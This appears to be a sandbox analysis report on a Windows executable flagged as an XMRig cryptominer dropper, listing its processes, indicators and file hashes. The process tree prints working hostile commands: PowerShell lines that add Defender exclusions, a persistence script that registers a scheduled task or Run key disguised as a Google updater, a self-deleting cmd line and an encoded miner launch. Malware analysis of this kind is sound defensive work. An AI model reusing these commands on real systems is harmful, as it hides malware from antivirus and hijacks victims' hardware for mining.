Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1798s
  • max time network
    1801s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3552
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:540
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4976
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2308
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:60
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:3676
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
        2⤵
          PID:3916
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:1180
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:4392
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:2496
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:396
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          1⤵
            PID:920
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4016
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:2224
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
            1⤵
              PID:2168
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k UnistackSvcGroup
              1⤵
                PID:3604

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Discovery

              System Information Discovery

              1
              T1082

              Query Registry

              1
              T1012

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files\Google\Chrome\updater.exe
                Filesize

                18KB

                MD5

                3a2693c544d68166d0a1e006c267774f

                SHA1

                79cf439c5b5b12341b7f44d6cf167a83daa129c3

                SHA256

                1a1152098e009013355410745d5f56dba0245a73d4f1a88e2c2b43bf6ed3bac0

                SHA512

                3c760722bec1cedefc7ab68a5dd5ac167807498bb9d4c9a5ac1ae1f2f7c7ac593d130edef2e9dc21069dd2f613c8a9aecf770785d52858c53b2584a6904533e7

              • C:\Program Files\Google\Chrome\updater.exe
                Filesize

                37KB

                MD5

                07a452a095a67d2dfd01884bc889963d

                SHA1

                093eed976983299694e64fe19cae463e70126a66

                SHA256

                b2e509c601553ef8a85ac947f67c9e2c4c1e098522a8d41e5c8d77cb5dd4b9bb

                SHA512

                afc4516d76948ae7411ca5bce450a1b5a56900fe54eef1365e1b11543b8f7a850d85c007084f20b21dcc1dabfad1cd9fd927b471550f1c6da45eca52f217e3a7

              • C:\Program Files\Google\Libs\g.log
                Filesize

                226B

                MD5

                fdba80d4081c28c65e32fff246dc46cb

                SHA1

                74f809dedd1fc46a3a63ac9904c80f0b817b3686

                SHA256

                b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                SHA512

                b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                d28a889fd956d5cb3accfbaf1143eb6f

                SHA1

                157ba54b365341f8ff06707d996b3635da8446f7

                SHA256

                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                SHA512

                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                02f4d5eceb808b662dc010b46f16cd65

                SHA1

                6ea36b74a71f8c4af37691d405c8149db6c88700

                SHA256

                f1016f26c71f59d0cc33f1474d5d7f10bcf110d8dffb4cf60d2babea71239bd4

                SHA512

                25c3202b9d55f96127bb7b090909bcae022a06db780673add777ba669a851907040892e77a93a3f00d5d37261b3a7d8aa879a7fe7e199ed0be89cf2639c51c1b

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwgxuhot.h1s.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                MD5

                d41d8cd98f00b204e9800998ecf8427e

                SHA1

                da39a3ee5e6b4b0d3255bfef95601890afd80709

                SHA256

                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                SHA512

                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                b42c70c1dbf0d1d477ec86902db9e986

                SHA1

                1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                SHA256

                8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                SHA512

                57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

              • memory/60-79-0x0000020723C40000-0x0000020723C5C000-memory.dmp
                Filesize

                112KB

              • memory/60-80-0x0000020723C20000-0x0000020723C2A000-memory.dmp
                Filesize

                40KB

              • memory/60-85-0x0000020721510000-0x0000020721520000-memory.dmp
                Filesize

                64KB

              • memory/60-84-0x0000020723C70000-0x0000020723C7A000-memory.dmp
                Filesize

                40KB

              • memory/60-83-0x0000020723C60000-0x0000020723C66000-memory.dmp
                Filesize

                24KB

              • memory/60-82-0x0000020723C30000-0x0000020723C38000-memory.dmp
                Filesize

                32KB

              • memory/60-81-0x0000020723C80000-0x0000020723C9A000-memory.dmp
                Filesize

                104KB

              • memory/60-78-0x00000207237F0000-0x00000207237FA000-memory.dmp
                Filesize

                40KB

              • memory/60-76-0x0000020723A00000-0x0000020723A1C000-memory.dmp
                Filesize

                112KB

              • memory/60-77-0x0000020723A20000-0x0000020723AD5000-memory.dmp
                Filesize

                724KB

              • memory/60-64-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/60-66-0x0000020721510000-0x0000020721520000-memory.dmp
                Filesize

                64KB

              • memory/60-65-0x0000020721510000-0x0000020721520000-memory.dmp
                Filesize

                64KB

              • memory/60-88-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/540-11-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/540-6-0x000001FFFEF00000-0x000001FFFEF22000-memory.dmp
                Filesize

                136KB

              • memory/540-14-0x000001FFFF520000-0x000001FFFF530000-memory.dmp
                Filesize

                64KB

              • memory/540-13-0x000001FFFF520000-0x000001FFFF530000-memory.dmp
                Filesize

                64KB

              • memory/540-12-0x000001FFFF520000-0x000001FFFF530000-memory.dmp
                Filesize

                64KB

              • memory/540-17-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/2496-134-0x00007FF77C8B0000-0x00007FF77C8C6000-memory.dmp
                Filesize

                88KB

              • memory/2496-128-0x00007FF77C8B0000-0x00007FF77C8C6000-memory.dmp
                Filesize

                88KB

              • memory/3080-0-0x00007FF6E2570000-0x00007FF6E2781000-memory.dmp
                Filesize

                2.1MB

              • memory/3080-36-0x00007FF6E2570000-0x00007FF6E2781000-memory.dmp
                Filesize

                2.1MB

              • memory/3676-100-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/3676-101-0x00000254A9B80000-0x00000254A9B90000-memory.dmp
                Filesize

                64KB

              • memory/3676-117-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/3676-115-0x00000254A9B80000-0x00000254A9B90000-memory.dmp
                Filesize

                64KB

              • memory/3676-114-0x00000254A9B80000-0x00000254A9B90000-memory.dmp
                Filesize

                64KB

              • memory/3676-113-0x00000254ABF00000-0x00000254ABFB5000-memory.dmp
                Filesize

                724KB

              • memory/3676-103-0x00000254A9B80000-0x00000254A9B90000-memory.dmp
                Filesize

                64KB

              • memory/3676-102-0x00000254A9B80000-0x00000254A9B90000-memory.dmp
                Filesize

                64KB

              • memory/3916-145-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-141-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-189-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-187-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-185-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-183-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-181-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-179-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-177-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-175-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-126-0x000001B81FA80000-0x000001B81FAA0000-memory.dmp
                Filesize

                128KB

              • memory/3916-125-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-127-0x000001B820170000-0x000001B8201B0000-memory.dmp
                Filesize

                256KB

              • memory/3916-173-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-129-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-130-0x000001B8201B0000-0x000001B8201D0000-memory.dmp
                Filesize

                128KB

              • memory/3916-131-0x000001B8201D0000-0x000001B8201F0000-memory.dmp
                Filesize

                128KB

              • memory/3916-133-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-171-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-135-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-136-0x000001B8201B0000-0x000001B8201D0000-memory.dmp
                Filesize

                128KB

              • memory/3916-137-0x000001B8201D0000-0x000001B8201F0000-memory.dmp
                Filesize

                128KB

              • memory/3916-139-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-169-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-143-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-167-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-147-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-149-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-151-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-153-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-155-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-157-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-159-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-161-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-163-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/3916-165-0x00007FF7BBB00000-0x00007FF7BC2F4000-memory.dmp
                Filesize

                8.0MB

              • memory/4016-54-0x00007FF6433C0000-0x00007FF6435D1000-memory.dmp
                Filesize

                2.1MB

              • memory/4016-124-0x00007FF6433C0000-0x00007FF6435D1000-memory.dmp
                Filesize

                2.1MB

              • memory/4056-47-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/4056-50-0x0000012D18720000-0x0000012D18730000-memory.dmp
                Filesize

                64KB

              • memory/4056-49-0x0000012D18720000-0x0000012D18730000-memory.dmp
                Filesize

                64KB

              • memory/4056-48-0x0000012D18720000-0x0000012D18730000-memory.dmp
                Filesize

                64KB

              • memory/4056-53-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/4976-30-0x0000025FB1140000-0x0000025FB1150000-memory.dmp
                Filesize

                64KB

              • memory/4976-29-0x0000025FB1140000-0x0000025FB1150000-memory.dmp
                Filesize

                64KB

              • memory/4976-28-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB

              • memory/4976-32-0x0000025FB1140000-0x0000025FB1150000-memory.dmp
                Filesize

                64KB

              • memory/4976-34-0x00007FF9A80C0000-0x00007FF9A8B81000-memory.dmp
                Filesize

                10.8MB